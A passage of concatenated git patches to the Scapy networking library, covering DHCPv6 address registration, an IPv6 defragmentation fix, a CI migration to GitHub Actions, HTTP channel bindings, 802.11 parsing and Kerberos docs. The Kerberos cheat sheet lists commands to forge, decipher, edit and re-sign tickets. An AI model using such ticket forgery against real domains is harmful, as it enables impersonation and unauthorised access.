"DHCP6_RelayReply"} + 13: "DHCP6_RelayReply", + 36: "DHCP6_AddrRegInform", + 37: "DHCP6_AddrRegReply", + } def _dhcp6_dispatcher(x, *args, **kargs): @@ -128,6 +131,7 @@ def _dhcp6_dispatcher(x, *args, **kargs): 79: "OPTION_CLIENT_LINKLAYER_ADDR", # RFC6939 103: "OPTION_CAPTIVE_PORTAL", # RFC8910 112: "OPTION_MUD_URL", # RFC8520 + 148: "OPTION_ADDR_REG_ENABLE", # RFC9686 } dhcp6opts_by_code = {1: "DHCP6OptClientId", @@ -187,10 +191,12 @@ def _dhcp6_dispatcher(x, *args, **kargs): 79: "DHCP6OptClientLinkLayerAddr", # RFC6939 103: "DHCP6OptCaptivePortal", # RFC8910 112: "DHCP6OptMudUrl", # RFC8520 + 148: "DHCP6OptAddrRegEnable", # RFC9686 } # sect 7.3 RFC 8415 : DHCP6 Messages types +# also RFC 9686 dhcp6types = {1: "SOLICIT", 2: "ADVERTISE", 3: "REQUEST", @@ -203,7 +209,10 @@ def _dhcp6_dispatcher(x, *args, **kargs): 10: "RECONFIGURE", 11: "INFORMATION-REQUEST", 12: "RELAY-FORW", - 13: "RELAY-REPL"} + 13: "RELAY-REPL", + 36: "ADDR-REG-INFORM", + 37: "ADDR-REG-REPLY", + } ##################################################################### @@ -1103,6 +1112,12 @@ class DHCP6OptMudUrl(_DHCP6OptGuessPayload): # RFC8520 )] +class DHCP6OptAddrRegEnable(_DHCP6OptGuessPayload): # RFC 9686 sect 4.1 + name = "DHCP6 Address Registration Option" + fields_desc = [ShortEnumField("optcode", 148, dhcp6opts), + ShortField("optlen", 0)] + + ##################################################################### # DHCPv6 messages # ##################################################################### @@ -1437,6 +1452,24 @@ def answers(self, other): self.peeraddr == other.peeraddr) +##################################################################### +# Address Registration-Inform Message (RFC 9686) +# - sent by clients who generated their own address and need it registered + +class DHCP6_AddrRegInform(DHCP6): + name = "DHCPv6 Information Request Message" + msgtype = 36 + +##################################################################### +# Address Registration-Reply Message (RFC 9686) +# - sent by servers who respond to the address registration-inform message + + +class DHCP6_AddrRegReply(DHCP6): + name = "DHCPv6 Information Reply Message" + msgtype = 37 + + bind_bottom_up(UDP, _dhcp6_dispatcher, {"dport": 547}) bind_bottom_up(UDP, _dhcp6_dispatcher, {"dport": 546}) diff --git a/test/scapy/layers/dhcp6.uts b/test/scapy/layers/dhcp6.uts index 9aebfe4c94f..cb87561f730 100644 --- a/test/scapy/layers/dhcp6.uts +++ b/test/scapy/layers/dhcp6.uts @@ -1310,6 +1310,19 @@ p = DHCP6OptVSS(s) assert p.type == 255 +############ +############ ++ Test DHCP6 Option - Address Registration Enabled + += DHCP6OptAddrRegEnable - Basic Instantiation +raw(DHCP6OptAddrRegEnable()) == b'\x00\x94\x00\x00' + += DHCP6OptAddrRegEnable - Basic Dissection +a=DHCP6OptAddrRegEnable(b'\x00\x94\x00\x00') +a.optcode == 148 and a.optlen == 0 + + + ############ ############ + Test DHCP6 Messages - DHCP6_Solicit @@ -1564,4 +1577,52 @@ raw(DHCP6_RelayReply()) == b'\r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ a=DHCP6_RelayReply(b'\r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') a.msgtype == 13 and a.hopcount == 0 and a.linkaddr == "::" and a.peeraddr == "::" +############ +############ ++ Test DHCP6 Messages - DHCP6_AddrRegInform + += DHCP6_AddrRegInform - Basic Instantiation +raw(DHCP6_AddrRegInform()) == b'\x24\x00\x00\x00' + += DHCP6_AddrRegInform - Basic Dissection +a = DHCP6_AddrRegInform(b'\x24\x00\x00\x00') +a.msgtype == 36 and a.trid == 0 + += DHCP6_AddrRegInform - Basic test of DHCP6_addrreginform.hashret() +DHCP6_AddrRegInform().hashret() == b'\x00\x00\x00' + += DHCP6_AddrRegInform - Test of DHCP6_addrreginform.hashret() with specific values +DHCP6_AddrRegInform(trid=0xbbccdd).hashret() == b'\xbb\xcc\xdd' + += DHCP6_AddrRegInform - UDP ports overload +a=UDP()/DHCP6_AddrRegInform() +a.sport == 546 and a.dport == 547 + += DHCP6_AddrRegInform - Dispatch based on UDP port +a=UDP(raw(UDP()/DHCP6_AddrRegInform())) +isinstance(a.payload, DHCP6_AddrRegInform) + +############ +############ ++ Test DHCP6 Messages - DHCP6_AddrRegReply + += DHCP6_AddrRegReply - Basic Instantiation +raw(DHCP6_AddrRegReply()) == b'\x25\x00\x00\x00' + += DHCP6_AddrRegReply - Basic Dissection +a = DHCP6_AddrRegReply(b'\x25\x00\x00\x00') +a.msgtype == 37 and a.trid == 0 + += DHCP6_AddrRegReply - Basic test of DHCP6_addrregreply.hashret() +DHCP6_AddrRegReply().hashret() == b'\x00\x00\x00' + += DHCP6_AddrRegReply - Test of DHCP6_addrregreply.hashret() with specific values +DHCP6_AddrRegReply(trid=0xbbccdd).hashret() == b'\xbb\xcc\xdd' + += DHCP6_AddrRegReply - UDP ports overload +a=UDP()/DHCP6_AddrRegReply() +a.sport == 546 and a.dport == 547 += DHCP6_AddrRegReply - Dispatch based on UDP port +a=UDP(raw(UDP()/DHCP6_AddrRegReply())) +isinstance(a.payload, DHCP6_AddrRegReply) From 027f4d436eb2799f69cd70d1c0b30e97efa7b84d Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 21 Apr 2025 23:58:42 +0200 Subject: [PATCH 1464/1632] Fix defragment6 (bug #4228) (#4631) * Fixed fragment data size in IPv6 defragmentation * Support IPv6.plen=None in defragment6 * Use the known size * Unit test added --------- Co-authored-by: shapaz <47742533+shapaz@users.noreply.github.com> --- scapy/layers/inet6.py | 6 +++++- test/scapy/layers/inet6.uts | 5 +++++ 2 files changed, 10 insertions(+), 1 deletion(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index f1ecc210c06..63681b0bee6 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1188,13 +1188,17 @@ def defragment6(packets): # regenerate the fragmentable part fragmentable = b"" + frag_hdr_len = 8 for p in res: q = p[IPv6ExtHdrFragment] offset = 8 * q.offset if offset != len(fragmentable): warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501 + frag_data_len = p[IPv6].plen + if frag_data_len is not None: + frag_data_len -= frag_hdr_len fragmentable += b"X" * (offset - len(fragmentable)) - fragmentable += raw(q.payload) + fragmentable += raw(q.payload)[:frag_data_len] # Regenerate the unfragmentable part. q = res[0].copy() diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index 206ab975c8a..4ec0295cac1 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -1904,6 +1904,11 @@ pkts = fragment6(IPv6()/IPv6ExtHdrFragment()/UDP(dport=42, sport=42)/Raw(load="A pkts = [IPv6(raw(p)) for p in pkts] assert defragment6(pkts).plen == 1508 += defragment6 - discard payload +pkt = Ether() / IPv6() / ICMPv6EchoRequest(data='b'*100) +frags = fragment6(pkt, 100) +pkt = defragment6(Ether(raw(frag / Padding(b'a' * 8))) for frag in frags) +assert b'a' not in pkt.data ############ ############ From cac47a05b4184e42299eba98b84cb01b380d0c81 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 22 Apr 2025 09:12:23 +0200 Subject: [PATCH 1465/1632] Replace AppVeyor with Github Actions (#4724) AppVeyor has been great and we really thank them for all these years. Sadly the image hasn't been updated in a very long time, and the service has become too unreliable to keep using it. --- .appveyor.yml | 51 ------------------- .config/ci/install.ps1 | 21 ++++++++ .config/ci/install.sh | 1 + .config/ci/test.ps1 | 27 ++++++++++ .config/ci/test.sh | 2 +- .../{appveyor => ci/windows}/InstallNpcap.ps1 | 2 +- .../windows}/InstallWindumpNpcap.ps1 | 2 +- .github/workflows/unittests.yml | 45 +++++++++++----- test/configs/windows2.utsc | 2 +- test/regression.uts | 2 +- test/windows.uts | 6 +-- tox.ini | 4 +- 12 files changed, 90 insertions(+), 75 deletions(-) delete mode 100644 .appveyor.yml create mode 100644 .config/ci/install.ps1 create mode 100644 .config/ci/test.ps1 rename .config/{appveyor => ci/windows}/InstallNpcap.ps1 (96%) rename .config/{appveyor => ci/windows}/InstallWindumpNpcap.ps1 (92%) diff --git a/.appveyor.yml b/.appveyor.yml deleted file mode 100644 index b27bc3ce9c6..00000000000 --- a/.appveyor.yml +++ /dev/null @@ -1,51 +0,0 @@ -environment: - # This key is encrypted using secdev's appveyor private key, - # dissected only on master builds (not PRs) and is used during - # npcap OEM installation - npcap_oem_key: - secure: d120KTZBsVnzZ+pFPLPEOTOkyJxTVRjhbDJn9L+RYnM= - # Python versions that will be tested - # Note: it defines variables that can be used later - matrix: - - PYTHON: "C:\\Python312-x64" - PYTHON_VERSION: "3.12.x" - PYTHON_ARCH: "64" - TOXENV: "py312-windows" - UT_FLAGS: "-K scanner" - - PYTHON: "C:\\Python312-x64" - PYTHON_VERSION: "3.12.x" - PYTHON_ARCH: "64" - TOXENV: "py312-windows" - UT_FLAGS: "-k scanner" - -# There is no build phase for Scapy -build: off - -install: - # Log some debug info - - ver - # Install the npcap, windump and wireshark suites - - ps: .\.config\appveyor\InstallNpcap.ps1 - - ps: .\.config\appveyor\InstallWindumpNpcap.ps1 - # Installs Wireshark 3.0 (and its dependencies) - # https://github.com/mkevenaar/chocolatey-packages/issues/16 - - choco install -n KB3033929 KB2919355 kb2999226 - - choco install -y wireshark - # Install Python modules - # https://github.com/tox-dev/tox/issues/791 - - "%PYTHON%\\python -m pip install virtualenv --upgrade" - - "%PYTHON%\\python -m pip install tox coverage" - -test_script: - # Set environment variables - - set PYTHONPATH=%APPVEYOR_BUILD_FOLDER% - - set PATH=%APPVEYOR_BUILD_FOLDER%;C:\Program Files\Wireshark\;C:\Program Files\Windump\;%PATH% - # - set TOX_PARALLEL_NO_SPINNER=1 - - # Main unit tests - - "%PYTHON%\\python -m tox -- %UT_FLAGS%" - -after_test: - # Run codecov - - ps: $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://uploader.codecov.io/latest/windows/codecov.exe -Outfile codecov.exe - - codecov.exe diff --git a/.config/ci/install.ps1 b/.config/ci/install.ps1 new file mode 100644 index 00000000000..5f9e5b58443 --- /dev/null +++ b/.config/ci/install.ps1 @@ -0,0 +1,21 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +# Install packages needed for the CI on Windows + +# Install npcap and windump +& "$PSScriptRoot\windows\InstallNpcap.ps1" +& "$PSScriptRoot\windows\InstallWindumpNpcap.ps1" + +# Install wireshark +choco install -y wireshark + +# Add to PATH +echo "C:\Program Files\Wireshark;C:\Program Files\Windump" | Out-File -FilePath $env:GITHUB_PATH -Encoding utf8 -Append + +# Update pip & setuptools & wheel (tox uses those) +python -m pip install --upgrade pip setuptools wheel --ignore-installed + +# Make sure tox is installed and up to date +python -m pip install -U tox --ignore-installed diff --git a/.config/ci/install.sh b/.config/ci/install.sh index 61f66837648..5bfeb12aeb2 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -4,6 +4,7 @@ # This file is part of Scapy # See https://scapy.net/ for more information +# Install packages needed for the CI on Linux/MacOS # Usage: # ./install.sh [install mode] diff --git a/.config/ci/test.ps1 b/.config/ci/test.ps1 new file mode 100644 index 00000000000..0e6fc39c87c --- /dev/null +++ b/.config/ci/test.ps1 @@ -0,0 +1,27 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +# test.ps1 +# Usage: +# ./test.ps1 +# Examples: +# ./test.sh 3.13 + +if ($args.Count -eq 0) { + Write-Host "Usage: .\test.ps1 " + exit +} + +# Set TOXENV +$PY_VERSION = "py" + ($args[0] -replace '\.', '') +$env:TOXENV = $PY_VERSION + "-windows-root" + +if ($env:GITHUB_ACTIONS) { + # Due to a security policy, the firewall of the Azure runner + # (Standard_DS2_v2) that runs Github Actions on Linux blocks ICMP. + $env:UT_FLAGS += " -K icmp_firewall" +} + +# Launch Scapy unit tests +python -m tox -- @($env:UT_FLAGS.Trim() -split ' ') diff --git a/.config/ci/test.sh b/.config/ci/test.sh index 94a5c576df1..baa2e4e1b5f 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -6,7 +6,7 @@ # test.sh # Usage: -# ./test.sh [tox version] [both/root/non_root (default root)] +# ./test.sh [python version] [both/root/non_root (default root)] # Examples: # ./test.sh 3.7 both # ./test.sh 3.9 non_root diff --git a/.config/appveyor/InstallNpcap.ps1 b/.config/ci/windows/InstallNpcap.ps1 similarity index 96% rename from .config/appveyor/InstallNpcap.ps1 rename to .config/ci/windows/InstallNpcap.ps1 index d8477fd9e1a..70024095784 100644 --- a/.config/appveyor/InstallNpcap.ps1 +++ b/.config/ci/windows/InstallNpcap.ps1 @@ -23,7 +23,7 @@ function DownloadNPCAP_free { $file = $PSScriptRoot+"\npcap-0.96.exe" $hash = "83667e1306fdcf7f9967c10277b36b87e50ee8812e1ee2bb9443bdd065dc04a1" # Download the 0.96 file from nmap servers - wget "https://npcap.com/dist/npcap-0.96.exe" -UseBasicParsing -OutFile $file + Invoke-WebRequest "https://npcap.com/dist/npcap-0.96.exe" -UseBasicParsing -OutFile $file return checkTheSum $file $hash } diff --git a/.config/appveyor/InstallWindumpNpcap.ps1 b/.config/ci/windows/InstallWindumpNpcap.ps1 similarity index 92% rename from .config/appveyor/InstallWindumpNpcap.ps1 rename to .config/ci/windows/InstallWindumpNpcap.ps1 index 76977f3710d..b6b8c940d80 100644 --- a/.config/appveyor/InstallWindumpNpcap.ps1 +++ b/.config/ci/windows/InstallWindumpNpcap.ps1 @@ -5,7 +5,7 @@ $checksum = "4253cbc494416c4917920e1f2424cdf039af8bc39f839a47aa4337bd28f4eb7e" ############ ############ # Download the file -wget $urlPath -UseBasicParsing -OutFile $PSScriptRoot"\npcap.zip" +Invoke-WebRequest $urlPath -UseBasicParsing -OutFile $PSScriptRoot"\npcap.zip" Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 6851466a56f..abcbfe9684f 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -94,9 +94,9 @@ jobs: python: "3.7" mode: non_root flags: " -K scanner" - # Linux root tests + # Linux root tests on last version - os: ubuntu-latest - python: "3.12" + python: "3.13" mode: root flags: " -K scanner" # PyPy tests: root only @@ -106,28 +106,33 @@ jobs: flags: " -K scanner" # Libpcap test - os: ubuntu-latest - python: "3.12" + python: "3.13" mode: root installmode: 'libpcap' flags: " -K scanner" # macOS tests - os: macos-14 - python: "3.12" + python: "3.13" mode: both flags: " -K scanner" + # windows tests + - os: windows-latest + python: "3.13" + mode: root + flags: " -K scanner" # Scanner tests - os: ubuntu-latest - python: "3.12" + python: "3.13" mode: root allow-failure: 'true' flags: " -k scanner" - - os: ubuntu-latest - python: "pypy3.9" - mode: root + - os: macos-14 + python: "3.13" + mode: both allow-failure: 'true' flags: " -k scanner" - - os: macos-14 - python: "3.12" + - os: windows-latest + python: "3.13" mode: both allow-failure: 'true' flags: " -k scanner" @@ -141,12 +146,24 @@ jobs: uses: actions/setup-python@v5 with: python-version: ${{ matrix.python }} - - name: Install Tox and any other packages + - name: Install Tox and any other packages (linux/osx) run: ./.config/ci/install.sh ${{ matrix.installmode }} - - name: Run Tox - run: UT_FLAGS="${{ matrix.flags }}" ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} + if: ${{ ! contains(matrix.os, 'windows') }} + - name: Install Tox and any other packages (win) + run: ./.config/ci/install.ps1 + if: ${{ contains(matrix.os, 'windows') }} + - name: Run Tox (linux/osx) + run: ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} + env: + UT_FLAGS: ${{ matrix.flags }} + if: ${{ ! contains(matrix.os, 'windows') }} + - name: Run Tox (win) + run: ./.config/ci/test.ps1 ${{ matrix.python }} + env: + UT_FLAGS: ${{ matrix.flags }} + if: ${{ contains(matrix.os, 'windows') }} - name: Codecov - uses: codecov/codecov-action@v4 + uses: codecov/codecov-action@v5 continue-on-error: true with: token: ${{ secrets.CODECOV_TOKEN }} diff --git a/test/configs/windows2.utsc b/test/configs/windows2.utsc index 1c5dbe0c9df..a1c8e302953 100644 --- a/test/configs/windows2.utsc +++ b/test/configs/windows2.utsc @@ -27,7 +27,7 @@ "broken_windows", "crypto_advanced", "mock_read_routes_bsd", - "appveyor_only", + "ci_only", "open_ssl_client", "vcan_socket", "ipv6", diff --git a/test/regression.uts b/test/regression.uts index 3cd10f1fd32..5fe21e23219 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -678,7 +678,7 @@ scapy_delete_temp_files() tmpfile = get_temp_file(autoext=".ut") tmpfile if WINDOWS: - assert "scapy" in tmpfile and tmpfile.lower().startswith('c:\\users\\appveyor\\appdata\\local\\temp') + assert "scapy" in tmpfile and "AppData\\Local\\Temp" in tmpfile else: import platform BYPASS_TMP = platform.python_implementation().lower() == "pypy" or DARWIN diff --git a/test/windows.uts b/test/windows.uts index 22e0f433ccf..59202833331 100644 --- a/test/windows.uts +++ b/test/windows.uts @@ -55,7 +55,7 @@ print(get_if_list()) assert all(x.startswith(r"\Device\NPF_") for x in get_if_list()) = test pcap_service_stop -~ appveyor_only require_gui npcap_service +~ ci_only require_gui npcap_service from scapy.arch.windows import pcap_service_stop @@ -63,7 +63,7 @@ pcap_service_stop() assert pcap_service_status() == False = test pcap_service_start -~ appveyor_only require_gui npcap_service +~ ci_only require_gui npcap_service from scapy.arch.windows import pcap_service_start @@ -96,7 +96,7 @@ conf.ifaces.reload() assert conf.use_pcap == False = Ping -~ netaccess needs_root +~ netaccess needs_root icmp_firewall def _test(): with conf.L3socket() as a: diff --git a/tox.ini b/tox.ini index 1b9349b8373..9fc2ef22960 100644 --- a/tox.ini +++ b/tox.ini @@ -4,13 +4,13 @@ # Tox environments: # py{version}-{os}-{non_root,root} -# In our testing, version can be 37 to 312 or py39 for pypy39 +# In our testing, version can be 37 to 313 or py39 for pypy39 [tox] # minversion = 4.0 skip_missing_interpreters = true # envlist = default when doing 'tox' -envlist = py{37,38,39,310,311,312}-{linux,bsd,windows}-{non_root,root} +envlist = py{37,38,39,310,311,312,313}-{linux,bsd,windows}-{non_root,root} # Main tests From 7cccb9e0a30d70a37dcb5f399e985c5a3f395102 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 22 Apr 2025 09:26:24 +0200 Subject: [PATCH 1466/1632] Remove appveyor badge (#4725) --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 0da1b8ff279..1e94f891a0c 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,6 @@ # Scapy   Scapy [![Scapy unit tests](https://github.com/secdev/scapy/actions/workflows/unittests.yml/badge.svg?branch=master&event=push)](https://github.com/secdev/scapy/actions/workflows/unittests.yml?query=event%3Apush) -[![AppVeyor Build status](https://ci.appveyor.com/api/projects/status/os03daotfja0wtp7/branch/master?svg=true)](https://ci.appveyor.com/project/secdev/scapy/branch/master) [![Codecov Status](https://codecov.io/gh/secdev/scapy/branch/master/graph/badge.svg)](https://codecov.io/gh/secdev/scapy) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/30ee6772bb264a689a2604f5cdb0437b)](https://www.codacy.com/app/secdev/scapy) [![PyPI Version](https://img.shields.io/pypi/v/scapy.svg)](https://pypi.python.org/pypi/scapy/) From d7ce0e4f3922d9a0361d87f02a731c5b10f03594 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 22 Apr 2025 09:29:40 +0200 Subject: [PATCH 1467/1632] Update codacy badge link --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1e94f891a0c..0a9b17ae4b5 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,7 @@ [![Scapy unit tests](https://github.com/secdev/scapy/actions/workflows/unittests.yml/badge.svg?branch=master&event=push)](https://github.com/secdev/scapy/actions/workflows/unittests.yml?query=event%3Apush) [![Codecov Status](https://codecov.io/gh/secdev/scapy/branch/master/graph/badge.svg)](https://codecov.io/gh/secdev/scapy) -[![Codacy Badge](https://api.codacy.com/project/badge/Grade/30ee6772bb264a689a2604f5cdb0437b)](https://www.codacy.com/app/secdev/scapy) +[![Codacy Badge](https://api.codacy.com/project/badge/Grade/30ee6772bb264a689a2604f5cdb0437b)](https://app.codacy.com/gh/secdev/scapy/dashboard) [![PyPI Version](https://img.shields.io/pypi/v/scapy.svg)](https://pypi.python.org/pypi/scapy/) [![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](LICENSE) [![Join the chat at https://gitter.im/secdev/scapy](https://badges.gitter.im/secdev/scapy.svg)](https://gitter.im/secdev/scapy) From e44c79e9219a104271e3521951e2d8eb47960ce6 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 22 Apr 2025 15:35:52 +0200 Subject: [PATCH 1468/1632] Add require_cbt support on HTTP (not S) server (#4726) --- scapy/layers/gssapi.py | 8 ++++++-- scapy/layers/http.py | 31 ++++++++++++++++++++----------- 2 files changed, 26 insertions(+), 13 deletions(-) diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index 8ed45368b7e..f1743770eef 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -346,9 +346,13 @@ def fromssl( # RFC5929 sect 4.1 if h == hashes.MD5 or h == hashes.SHA1: h = hashes.SHA256 + # Get bytes of first certificate if there are multiple + c = cert.x509Cert.copy() + c.remove_payload() + cdata = bytes(c) # Calc hash of certificate digest = hashes.Hash(h) - digest.update(bytes(cert.x509Cert)) + digest.update(cdata) cbdata = digest.finalize() elif token_type == ChannelBindingType.TLS_UNIQUE: # RFC5929 sect 3 @@ -414,7 +418,7 @@ class CONTEXT: __slots__ = ["state", "_flags", "passive"] - def __init__(self, req_flags: Optional['GSS_C_FLAGS | GSS_S_FLAGS'] = None): + def __init__(self, req_flags: Optional["GSS_C_FLAGS | GSS_S_FLAGS"] = None): if req_flags is None: # Default req_flags = ( diff --git a/scapy/layers/http.py b/scapy/layers/http.py index b43d096924f..92caee51663 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -1027,6 +1027,9 @@ class HTTP_Server(Automaton): :param ssp: the SSP to serve. If None, unauthenticated (or basic). :param mech: the HTTP_AUTH_MECHS to use (default: NONE) + :param require_cbt: require Channel Bindings to be valid (default: False) + :param cbt_cert: the path to the certificate used for channel bindings. + Useful if behind a reverse proxy. (default: None) Other parameters: @@ -1042,6 +1045,8 @@ def __init__( mech=HTTP_AUTH_MECHS.NONE, verb=True, ssp=None, + require_cbt: bool = False, + cbt_cert: str = None, *args, **kwargs, ): @@ -1053,8 +1058,20 @@ def __init__( self.ssp = ssp self.authmethod = mech.value self.sspcontext = None + + # CBT settings self.ssp_req_flags = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS - self.chan_bindings = GSS_C_NO_CHANNEL_BINDINGS + if require_cbt: + self.ssp_req_flags &= ~GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS + if cbt_cert: + self.chan_bindings = GssChannelBindings.fromssl( + ChannelBindingType.TLS_SERVER_END_POINT, + certfile=cbt_cert, + ) + else: + self.chan_bindings = GSS_C_NO_CHANNEL_BINDINGS + + # Auth settings self.basic = False self.BASIC_IDENTITIES = kwargs.pop("BASIC_IDENTITIES", {}) self.BASIC_REALM = kwargs.pop("BASIC_REALM", "default") @@ -1311,16 +1328,8 @@ def __init__( mech=mech, verb=verb, ssp=ssp, + cbt_cert=cert, + require_cbt=require_cbt, *args, **kwargs, ) - - # Set channel binding - if cert: - self.chan_bindings = GssChannelBindings.fromssl( - ChannelBindingType.TLS_SERVER_END_POINT, - certfile=cert, - ) - if require_cbt: - # We require CBT by removing GSS_S_ALLOW_MISSING_BINDINGS - self.ssp_req_flags &= ~GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS From 0648c0d36ad7e613e7a4014fe89d8829ad50df83 Mon Sep 17 00:00:00 2001 From: Harry Dalton Date: Wed, 23 Apr 2025 07:59:53 +0100 Subject: [PATCH 1469/1632] Make Dot11EltVendorSpecific packet extensible (#4660) * Make Dot11EltVendorSpecific packet extensible See #4659 This commit allows the Dot11EltVendorSpecific packet to dispatch to its subclasses based on their OUI, with the same idiom that the parent Dot11Elt uses to select subclasses based on their ID already: https://github.com/secdev/scapy/blob/c15a670926185f6ddb9b3330ed1f947ff6f14b92/scapy/layers/dot11.py#L1057-L1074 This is just a rough sketch, so feedback very welcome to make sure it is heading in the right direction :) * Fix copy-paste typo * Fix child register_variant swallowing call to parent register_variant * Fix 'TODO' * Remove comment --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/dot11.py | 49 ++++++++++++++++++++++++++++++------------- 1 file changed, 35 insertions(+), 14 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 96cf6619847..862ed6686de 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -1439,22 +1439,25 @@ class Dot11EltVendorSpecific(Dot11Elt): def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt: oui = struct.unpack("!I", b"\x00" + _pkt[2:5])[0] - if oui == 0x0050f2: # Microsoft - type_ = orb(_pkt[5]) - if type_ == 0x01: - # MS WPA IE - return Dot11EltMicrosoftWPA - elif type_ == 0x02: - # MS WME IE TODO - # return Dot11EltMicrosoftWME - pass - elif type_ == 0x04: - # MS WPS IE TODO - # return Dot11EltWPS - pass - return Dot11EltVendorSpecific + ouicls = cls.registered_ouis.get(oui, cls) + if ouicls.dispatch_hook != cls.dispatch_hook: + # Sub-classes can have their own dispatch_hook + return ouicls.dispatch_hook(_pkt=_pkt, *args, **kargs) + cls = ouicls return cls + registered_ouis = {} + + @classmethod + def register_variant(cls): + oui = cls.oui.default + if not oui: + # This is Dot11EltVendorSpecific, register it in the super-class. + super().register_variant() + elif oui not in cls.registered_ouis: + # Sub-Vendor (e.g. Dot11EltMicrosoftWPA) + cls.registered_ouis[oui] = cls + class Dot11EltMicrosoftWPA(Dot11EltVendorSpecific): name = "802.11 Microsoft WPA" @@ -1467,6 +1470,24 @@ class Dot11EltMicrosoftWPA(Dot11EltVendorSpecific): XByteField("type", 0x01) ] + Dot11EltRSN.fields_desc[2:8] + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt: + type_ = orb(_pkt[5]) + if type_ == 0x01: + # MS WPA IE + return Dot11EltMicrosoftWPA + elif type_ == 0x02: + # MS WME IE TODO + # return Dot11EltMicrosoftWME + pass + elif type_ == 0x04: + # MS WPS IE TODO + # return Dot11EltWPS + pass + return Dot11EltVendorSpecific + return cls + # 802.11-2016 9.4.2.19 From 57db4aad25c9c49af2cb6245b00451b621ec4a85 Mon Sep 17 00:00:00 2001 From: Xavier Mehrenberger Date: Fri, 16 May 2025 18:59:10 +0200 Subject: [PATCH 1470/1632] Kerberos keytab doc (#4742) Ticketer.open_file was renamed to open_ccache in cd17acbfd3260266578c4dd73edb7a2ab780e7b1 --- doc/scapy/layers/kerberos.rst | 62 +++++++++++++++++------------------ 1 file changed, 31 insertions(+), 31 deletions(-) diff --git a/doc/scapy/layers/kerberos.rst b/doc/scapy/layers/kerberos.rst index a6427f395fe..a9d8472a443 100644 --- a/doc/scapy/layers/kerberos.rst +++ b/doc/scapy/layers/kerberos.rst @@ -86,7 +86,7 @@ that are available. For more detail regarding the parameters of the functions, i $ scapy >>> load_module("ticketer") >>> t = Ticketer() - >>> t.open_file("/tmp/krb5cc_1000") + >>> t.open_ccache("/tmp/krb5cc_1000") >>> t.show() Tickets: 1. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL @@ -256,7 +256,7 @@ This ticket was saved to a ``.ccache`` file, that we'll know try to open. >>> load_module("ticketer") >>> t = Ticketer() - >>> t.open_file("krb.ccache") + >>> t.open_ccache("krb.ccache") >>> t.show() Tickets: 1. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL @@ -281,35 +281,35 @@ This ticket was saved to a ``.ccache`` file, that we'll know try to open. Cheat sheet ----------- -+-------------------------------------+--------------------------------+ -| Command | Description | -+=====================================+================================+ -| ``load_module("ticketer")`` | Load ticketer++ | -+-------------------------------------+--------------------------------+ -| ``t = Ticketer()`` | Create a Ticketer object | -+-------------------------------------+--------------------------------+ -| ``t.open_file("/tmp/krb5cc_1000")`` | Open a ccache file | -+-------------------------------------+--------------------------------+ -| ``t.save()`` | Save a ccache file | -+-------------------------------------+--------------------------------+ -| ``t.show()`` | List the tickets | -+-------------------------------------+--------------------------------+ -| ``t.create_ticket()`` | Forge a ticket | -+-------------------------------------+--------------------------------+ -| ``dTkt = t.dec_ticket()`` | Decipher a ticket | -+-------------------------------------+--------------------------------+ -| ``t.update_ticket(, dTkt)`` | Re-inject a deciphered ticket | -+-------------------------------------+--------------------------------+ -| ``t.edit_ticket()`` | Edit a ticket (GUI) | -+-------------------------------------+--------------------------------+ -| ``t.resign_ticket()`` | Resign a ticket | -+-------------------------------------+--------------------------------+ -| ``t.request_tgt(upn, [...])`` | Request a TGT | -+-------------------------------------+--------------------------------+ 